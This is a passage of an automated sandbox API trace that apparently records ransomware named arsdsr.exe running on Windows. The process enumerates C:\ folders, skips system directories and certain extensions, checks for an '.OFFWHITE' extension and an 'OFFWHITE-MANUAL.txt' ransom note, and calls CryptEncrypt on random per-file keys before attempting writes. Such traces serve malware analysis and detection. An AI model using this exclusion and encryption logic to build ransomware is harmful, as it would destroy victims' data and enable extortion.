hTemplateFile=0x0) returned 0xffffffff [0082.349] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295f8e0 | out: lpFileSize=0x295f8e0*=-4251584188) returned 0 [0082.349] GetProcessHeap () returned 0x500000 [0082.349] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5486e8 [0082.349] GetProcessHeap () returned 0x500000 [0082.349] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548700 [0082.350] GetProcessHeap () returned 0x500000 [0082.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523a70 [0082.350] GetProcessHeap () returned 0x500000 [0082.350] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523b78 [0082.350] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.350] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.350] SystemFunction036 (in: RandomBuffer=0x5486e8, RandomBufferLength=0x10 | out: RandomBuffer=0x5486e8) returned 1 [0082.350] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.350] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.350] SystemFunction036 (in: RandomBuffer=0x548700, RandomBufferLength=0x10 | out: RandomBuffer=0x548700) returned 1 [0082.350] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.350] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.350] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523a70*, pdwDataLen=0x295f690*=0x10, dwBufLen=0x100 | out: pbData=0x523a70*, pdwDataLen=0x295f690*=0x100) returned 1 [0082.350] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.350] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.350] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523b78*, pdwDataLen=0x295f68c*=0x10, dwBufLen=0x100 | out: pbData=0x523b78*, pdwDataLen=0x295f68c*=0x100) returned 1 [0082.351] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295f944, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.351] SetLastError (dwErrCode=0x0) [0082.351] WriteFile (in: hFile=0xffffffff, lpBuffer=0x523a70, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0) returned 0 [0082.351] GetLastError () returned 0x6 [0082.351] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac54a060, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac54a060, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac54a060, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x0, dwReserved1=0x0, cFileName="BOOTSECT.BAK", cAlternateFileName="")) returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2=".") returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="..") returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="...") returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="windows") returned -1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="$recycle.bin") returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="rsa") returned -1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="ntuser.dat") returned -1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="programdata") returned -1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="appdata") returned 1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="program files") returned -1 [0082.351] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="program files (x86)") returned -1 [0082.351] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.351] lstrcatW (in: lpString1="C:/", lpString2="BOOTSECT.BAK" | out: lpString1="C:/BOOTSECT.BAK") returned="C:/BOOTSECT.BAK" [0082.351] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.351] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.351] PathFindExtensionW (pszPath="BOOTSECT.BAK") returned=".BAK" [0082.351] lstrcmpiW (lpString1=".BAK", lpString2=".exe") returned -1 [0082.351] lstrcmpiW (lpString1=".BAK", lpString2=".log") returned -1 [0082.351] lstrcmpiW (lpString1=".BAK", lpString2=".cab") returned -1 [0082.351] lstrcmpiW (lpString1=".BAK", lpString2=".cmd") returned -1 [0082.351] lstrcmpiW (lpString1=".BAK", lpString2=".com") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".cpl") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".ini") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".dll") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".url") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".ttf") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".mp3") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".pif") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".mp4") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".OFFWHITE") returned -1 [0082.352] lstrcmpiW (lpString1=".BAK", lpString2=".msi") returned -1 [0082.352] lstrcmpiW (lpString1="BOOTSECT.BAK", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.352] GetProcessHeap () returned 0x500000 [0082.352] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd50 [0082.352] CreateFileW (lpFileName="C:/BOOTSECT.BAK" (normalized: "c:\\bootsect.bak"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.353] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295f8e0 | out: lpFileSize=0x295f8e0*=-4251584188) returned 0 [0082.353] GetProcessHeap () returned 0x500000 [0082.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548718 [0082.353] GetProcessHeap () returned 0x500000 [0082.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548730 [0082.353] GetProcessHeap () returned 0x500000 [0082.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523c80 [0082.353] GetProcessHeap () returned 0x500000 [0082.353] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523d88 [0082.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.353] SystemFunction036 (in: RandomBuffer=0x548718, RandomBufferLength=0x10 | out: RandomBuffer=0x548718) returned 1 [0082.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.353] SystemFunction036 (in: RandomBuffer=0x548730, RandomBufferLength=0x10 | out: RandomBuffer=0x548730) returned 1 [0082.353] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.353] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523c80*, pdwDataLen=0x295f690*=0x10, dwBufLen=0x100 | out: pbData=0x523c80*, pdwDataLen=0x295f690*=0x100) returned 1 [0082.354] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.354] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.354] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523d88*, pdwDataLen=0x295f68c*=0x10, dwBufLen=0x100 | out: pbData=0x523d88*, pdwDataLen=0x295f68c*=0x100) returned 1 [0082.354] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295f944, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.354] SetLastError (dwErrCode=0x0) [0082.354] WriteFile (in: hFile=0xffffffff, lpBuffer=0x523c80, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0) returned 0 [0082.354] GetLastError () returned 0x6 [0082.354] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Config.Msi", cAlternateFileName="")) returned 1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2=".") returned 1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="..") returned 1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="...") returned 1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="windows") returned -1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="$recycle.bin") returned 1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="rsa") returned -1 [0082.354] lstrcmpiW (lpString1="Config.Msi", lpString2="ntuser.dat") returned -1 [0082.355] lstrcmpiW (lpString1="Config.Msi", lpString2="programdata") returned -1 [0082.355] lstrcmpiW (lpString1="Config.Msi", lpString2="appdata") returned 1 [0082.355] lstrcmpiW (lpString1="Config.Msi", lpString2="program files") returned -1 [0082.355] lstrcmpiW (lpString1="Config.Msi", lpString2="program files (x86)") returned -1 [0082.355] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.355] lstrcatW (in: lpString1="C:/", lpString2="Config.Msi" | out: lpString1="C:/Config.Msi") returned="C:/Config.Msi" [0082.355] lstrcatW (in: lpString1="C:/Config.Msi", lpString2="\\" | out: lpString1="C:/Config.Msi\\") returned="C:/Config.Msi\\" [0082.355] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/Config.Msi\\" | out: lpString1="C:/Config.Msi\\") returned="C:/Config.Msi\\" [0082.355] lstrcatW (in: lpString1="C:/Config.Msi\\", lpString2="*.*" | out: lpString1="C:/Config.Msi\\*.*") returned="C:/Config.Msi\\*.*" [0082.355] FindFirstFileW (in: lpFileName="C:/Config.Msi\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb6bab709, dwReserved1=0x51f911b1, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0082.355] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.355] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb6bab709, dwReserved1=0x51f911b1, cFileName="..", cAlternateFileName="")) returned 1 [0082.355] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.355] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.356] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb6bab709, dwReserved1=0x51f911b1, cFileName="..", cAlternateFileName="")) returned 0 [0082.356] FindClose (in: hFindFile=0x5446d0 | out: hFindFile=0x5446d0) returned 1 [0082.356] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x307290f2, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x307290f2, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x307290f2, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents and Settings", cAlternateFileName="DOCUME~1")) returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2=".") returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="..") returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="...") returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="windows") returned -1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="$recycle.bin") returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="rsa") returned -1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="ntuser.dat") returned -1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="programdata") returned -1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="appdata") returned 1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="program files") returned -1 [0082.356] lstrcmpiW (lpString1="Documents and Settings", lpString2="program files (x86)") returned -1 [0082.356] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.357] lstrcatW (in: lpString1="C:/", lpString2="Documents and Settings" | out: lpString1="C:/Documents and Settings") returned="C:/Documents and Settings" [0082.357] lstrcatW (in: lpString1="C:/Documents and Settings", lpString2="\\" | out: lpString1="C:/Documents and Settings\\") returned="C:/Documents and Settings\\" [0082.357] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/Documents and Settings\\" | out: lpString1="C:/Documents and Settings\\") returned="C:/Documents and Settings\\" [0082.357] lstrcatW (in: lpString1="C:/Documents and Settings\\", lpString2="*.*" | out: lpString1="C:/Documents and Settings\\*.*") returned="C:/Documents and Settings\\*.*" [0082.357] FindFirstFileW (in: lpFileName="C:/Documents and Settings\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xcd4f5c20, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0xc182c7c0, ftLastAccessTime.dwHighDateTime=0x1d3373b, ftLastWriteTime.dwLowDateTime=0xc182c7c0, ftLastWriteTime.dwHighDateTime=0x1d3373b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xb6bab709, dwReserved1=0x51f911b1, cFileName="..", cAlternateFileName="")) returned 0xffffffff [0082.357] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x56257dc0, ftCreationTime.dwHighDateTime=0x1d2de2a, ftLastAccessTime.dwLowDateTime=0x56257dc0, ftLastAccessTime.dwHighDateTime=0x1d2de2a, ftLastWriteTime.dwLowDateTime=0xae99ef60, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x5ff9d000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="hiberfil.sys", cAlternateFileName="")) returned 1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2=".") returned 1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="..") returned 1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="...") returned 1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="windows") returned -1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="$recycle.bin") returned 1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="rsa") returned -1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="ntuser.dat") returned -1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="programdata") returned -1 [0082.357] lstrcmpiW (lpString1="hiberfil.sys", lpString2="appdata") returned 1 [0082.358] lstrcmpiW (lpString1="hiberfil.sys", lpString2="program files") returned -1 [0082.358] lstrcmpiW (lpString1="hiberfil.sys", lpString2="program files (x86)") returned -1 [0082.358] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.358] lstrcatW (in: lpString1="C:/", lpString2="hiberfil.sys" | out: lpString1="C:/hiberfil.sys") returned="C:/hiberfil.sys" [0082.358] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.358] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.358] PathFindExtensionW (pszPath="hiberfil.sys") returned=".sys" [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".exe") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".log") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".cab") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".cmd") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".com") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".cpl") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".ini") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".dll") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".url") returned -1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".ttf") returned -1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".mp3") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".pif") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".mp4") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".OFFWHITE") returned 1 [0082.358] lstrcmpiW (lpString1=".sys", lpString2=".msi") returned 1 [0082.358] lstrcmpiW (lpString1="hiberfil.sys", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0082.358] GetProcessHeap () returned 0x500000 [0082.358] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52bd70 [0082.358] CreateFileW (lpFileName="C:/hiberfil.sys" (normalized: "c:\\hiberfil.sys"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0082.359] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295f8e0 | out: lpFileSize=0x295f8e0*=-4251584188) returned 0 [0082.359] GetProcessHeap () returned 0x500000 [0082.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548748 [0082.359] GetProcessHeap () returned 0x500000 [0082.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548760 [0082.359] GetProcessHeap () returned 0x500000 [0082.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523e90 [0082.359] GetProcessHeap () returned 0x500000 [0082.359] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x523f98 [0082.359] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.359] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.359] SystemFunction036 (in: RandomBuffer=0x548748, RandomBufferLength=0x10 | out: RandomBuffer=0x548748) returned 1 [0082.359] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.359] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.359] SystemFunction036 (in: RandomBuffer=0x548760, RandomBufferLength=0x10 | out: RandomBuffer=0x548760) returned 1 [0082.359] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.359] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.359] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523e90*, pdwDataLen=0x295f690*=0x10, dwBufLen=0x100 | out: pbData=0x523e90*, pdwDataLen=0x295f690*=0x100) returned 1 [0082.360] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0082.360] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0082.360] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x523f98*, pdwDataLen=0x295f68c*=0x10, dwBufLen=0x100 | out: pbData=0x523f98*, pdwDataLen=0x295f68c*=0x100) returned 1 [0082.360] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295f944, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0082.360] SetLastError (dwErrCode=0x0) [0082.360] WriteFile (in: hFile=0xffffffff, lpBuffer=0x523e90, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295f8cc, lpOverlapped=0x0) returned 0 [0082.360] GetLastError () returned 0x6 [0082.360] FindNextFileW (in: hFindFile=0x5445d0, lpFindFileData=0x295f918 | out: lpFindFileData=0x295f918*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSOCache", cAlternateFileName="")) returned 1 [0082.360] lstrcmpiW (lpString1="MSOCache", lpString2=".") returned 1 [0082.360] lstrcmpiW (lpString1="MSOCache", lpString2="..") returned 1 [0082.360] lstrcmpiW (lpString1="MSOCache", lpString2="...") returned 1 [0082.360] lstrcmpiW (lpString1="MSOCache", lpString2="windows") returned -1 [0082.360] lstrcmpiW (lpString1="MSOCache", lpString2="$recycle.bin") returned 1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="rsa") returned -1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="ntuser.dat") returned -1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="programdata") returned -1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="appdata") returned 1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="program files") returned -1 [0082.361] lstrcmpiW (lpString1="MSOCache", lpString2="program files (x86)") returned -1 [0082.361] lstrcpyW (in: lpString1=0x295fb68, lpString2="C:/" | out: lpString1="C:/") returned="C:/" [0082.361] lstrcatW (in: lpString1="C:/", lpString2="MSOCache" | out: lpString1="C:/MSOCache") returned="C:/MSOCache" [0082.361] lstrcatW (in: lpString1="C:/MSOCache", lpString2="\\" | out: lpString1="C:/MSOCache\\") returned="C:/MSOCache\\" [0082.361] lstrcpyW (in: lpString1=0x295f6f0, lpString2="C:/MSOCache\\" | out: lpString1="C:/MSOCache\\") returned="C:/MSOCache\\" [0082.361] lstrcatW (in: lpString1="C:/MSOCache\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\*.*") returned="C:/MSOCache\\*.*" [0082.361] FindFirstFileW (in: lpFileName="C:/MSOCache\\*.*", lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc5a9f080, dwReserved1=0x86e42fb4, cFileName=".", cAlternateFileName="")) returned 0x5446d0 [0082.361] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0082.361] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2013, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe7b42810, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe7b42810, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc5a9f080, dwReserved1=0x86e42fb4, cFileName="..", cAlternateFileName="")) returned 1 [0082.361] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0082.361] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0082.361] FindNextFileW (in: hFindFile=0x5446d0, lpFindFileData=0x295f298 | out: lpFindFileData=0x295f298*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b42810, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xa5cd3a40, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5cd3a40, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xc5a9f080, dwReserved1=0x86e42fb4, cFileName="All Users", cAlternateFileName="ALLUSE~1")) returned 1 [0082.361] lstrcmpiW (lpString1="All Users", lpString2=".") returned 1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="..") returned 1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="...") returned 1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="windows") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="$recycle.bin") returned 1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="rsa") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="ntuser.dat") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="programdata") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="appdata") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="program files") returned -1 [0082.362] lstrcmpiW (lpString1="All Users", lpString2="program files (x86)") returned -1 [0082.362] lstrcpyW (in: lpString1=0x295f4e8, lpString2="C:/MSOCache\\" | out: lpString1="C:/MSOCache\\") returned="C:/MSOCache\\" [0082.362] lstrcatW (in: lpString1="C:/MSOCache\\", lpString2="All Users" | out: lpString1="C:/MSOCache\\All Users") returned="C:/MSOCache\\All Users" [0082.362] lstrcatW (in: lpString1="C:/MSOCache\\All Users", lpString2="\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.362] lstrcpyW (in: lpString1=0x295f070, lpString2="C:/MSOCache\\All Users\\" | out: lpString1="C:/MSOCache\\All Users\\") returned="C:/MSOCache\\All Users\\" [0082.362] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\", lpString2="*.*" | out: lpString1="C:/MSOCache\\All Users\\*.*") returned="C:/MSOCache\\All Users\\*.*" [0082.362] FindFirstFileW (in: lpFileName="C:/MSOCache\\All Users\\*.*", 